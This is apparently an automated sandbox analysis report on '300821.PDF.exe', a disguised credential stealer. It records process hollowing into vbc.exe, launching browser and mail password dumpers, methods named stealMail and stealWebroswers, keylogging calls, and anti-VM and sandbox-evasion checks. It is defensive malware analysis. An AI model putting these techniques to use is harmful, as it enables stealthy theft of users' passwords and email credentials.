Source: C:\Users\user\Desktop\300821.PDF.exe | Code function: 5_2_078BB4E0
Source: C:\Users\user\Desktop\300821.PDF.exe | Code function: 5_2_078BB198
Source: C:\Users\user\Desktop\300821.PDF.exe | Code function: 5_2_078B0006
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00404419
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00404516
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00413538
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_004145A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0040E639
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_004337AF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_004399B1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_0043DAE7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00405CF6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00403F85
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00411F99
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 9_2_00404DDB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 9_2_0040BD8A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 9_2_00404E4C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 9_2_00404EBD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 9_2_00404F4E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00413F8E appears 66 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00413E2D appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00442A90 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 004141D6 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00411538 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
Source: 300821.PDF.exe, 00000000.00000000.646783679.0000000000B54000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamePermissionTokenTy.exe4 vs 300821.PDF.exe
Source: 300821.PDF.exe, 00000000.00000002.665512649.0000000002F61000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamePhulli.exe0 vs 300821.PDF.exe
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 300821.PDF.exe
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 300821.PDF.exe
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemailpv.exe< vs 300821.PDF.exe
Source: 300821.PDF.exe, 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs 300821.PDF.exe
Source: 300821.PDF.exe, 00000005.00000002.914852262.0000000000482000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamePhulli.exe0 vs 300821.PDF.exe
Source: 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 300821.PDF.exe
Source: 300821.PDF.exe, 00000005.00000002.914958023.00000000007E4000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamePermissionTokenTy.exe4 vs 300821.PDF.exe
Source: 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemailpv.exe< vs 300821.PDF.exe
Source: 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 300821.PDF.exe
Source: 300821.PDF.exe | Binary or memory string: OriginalFilenamePermissionTokenTy.exe4 vs 300821.PDF.exe
Source: 300821.PDF.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 300821.PDF.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\Desktop\300821.PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\300821.PDF.exe 'C:\Users\user\Desktop\300821.PDF.exe'
Source: C:\Users\user\Desktop\300821.PDF.exe | Process created: C:\Users\user\Desktop\300821.PDF.exe C:\Users\user\Desktop\300821.PDF.exe
Source: C:\Users\user\Desktop\300821.PDF.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\Desktop\300821.PDF.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\Desktop\300821.PDF.exe | Process created: C:\Users\user\Desktop\300821.PDF.exe C:\Users\user\Desktop\300821.PDF.exe
Source: C:\Users\user\Desktop\300821.PDF.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\Desktop\300821.PDF.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\Desktop\300821.PDF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\300821.PDF.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\300821.PDF.exe.log
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\bhvE2B1.tmp
Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@7/5@2/2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe, 00000008.00000002.693074434.0000000000400000.00000040.00000001.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,
Source: C:\Users\user\Desktop\300821.PDF.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.cs | Base64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', 'ggUy50Tcd18+XCI8OVsRlV1xkFCd6kyYX/QGFeNONAN7gYAXhVHJnfOOd2WfSU1H', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 8_2_00411EF8 FindResourceW,SizeofResource,LoadResource,LockResource,
Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.cs | Cryptographic APIs: 'CreateDecryptor'
Source: C:\Users\user\Desktop\300821.PDF.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\300821.PDF.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: 300821.PDF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 300821.PDF.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb | source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb | source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb | source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe

                      Data Obfuscation:

                      .NET source code contains potential unpacker
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.cs; .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.cs; .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.cs; .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.cs; .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Code function: 0_2_00A66B4E push ss; iretd
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Code function: 5_2_006F6B4E push ss; iretd
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Code function: 5_2_078BFA12 push 00000066h; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 8_2_00442871 push ecx; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 8_2_00442A90 push eax; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 8_2_00446E54 push eax; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 9_2_00411879 push ecx; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 9_2_004118A0 push eax; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 8_2_004422C7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: initial sample; Static PE information: section name: .text entropy: 7.08241150269

                      Hooking and other Techniques for Hiding and Protection:

                      Changes the view of files in windows explorer (hidden files and folders)
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                      Uses an obfuscated file name to hide its real file extension (double extension)
                      Source: Possible double extension: pdf.exe; Static PE information: 300821.PDF.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 8_2_00441975 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3
                      Source: Yara match; File source: 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: 300821.PDF.exe PID: 4816, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp; Binary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp; Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\300821.PDF.exe TID: 4744; Thread sleep time: -39128s >= -30000s
                      Source: C:\Users\user\Desktop\300821.PDF.exe TID: 1664; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\300821.PDF.exe TID: 6784; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\300821.PDF.exe TID: 5712; Thread sleep time: -120000s >= -30000s
                      Source: C:\Users\user\Desktop\300821.PDF.exe TID: 6104; Thread sleep time: -140000s >= -30000s
                      Source: C:\Users\user\Desktop\300821.PDF.exe TID: 5648; Thread sleep time: -98400s >= -30000s
                      Source: C:\Users\user\Desktop\300821.PDF.exe TID: 7140; Thread sleep time: -180000s >= -30000s
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Last function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 8_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Code function: 5_2_0100B890 sidt fword ptr [eax]
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Thread delayed: delay time: 180000
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Window / User API: threadDelayed 492
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Code function: 5_2_01006320 sgdt fword ptr [eax]
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Process information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 8_2_004161B0 memset,GetSystemInfo,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 8_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 8_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 9_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Thread delayed: delay time: 39128
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Thread delayed: delay time: 120000
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Thread delayed: delay time: 140000
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Thread delayed: delay time: 180000
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp; Binary or memory string: vmware
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp; Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp; Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp; Binary or memory string: VMWARE
                      Source: bhvE2B1.tmp.8.dr; Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&ctry=US&time=20200930T073559Z&lc=en-US&pl=en-US&idtp=mid&uid=a9223225-82ba-4622-a95e-dcecd6738abd&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=1002378dd3f24e12b7a10ceb62be6d33&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663203&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663203&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp; Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp; Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp; Binary or memory string: VMware SVGA II
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp; Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 8_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 8_2_004422C7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Sample uses process hollowing technique
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                      .NET source code references suspicious native API functions
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.cs; Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, RunPE.cs; Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Process created: C:\Users\user\Desktop\300821.PDF.exe C:\Users\user\Desktop\300821.PDF.exe
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Users\user\Desktop\300821.PDF.exe VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exe; Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
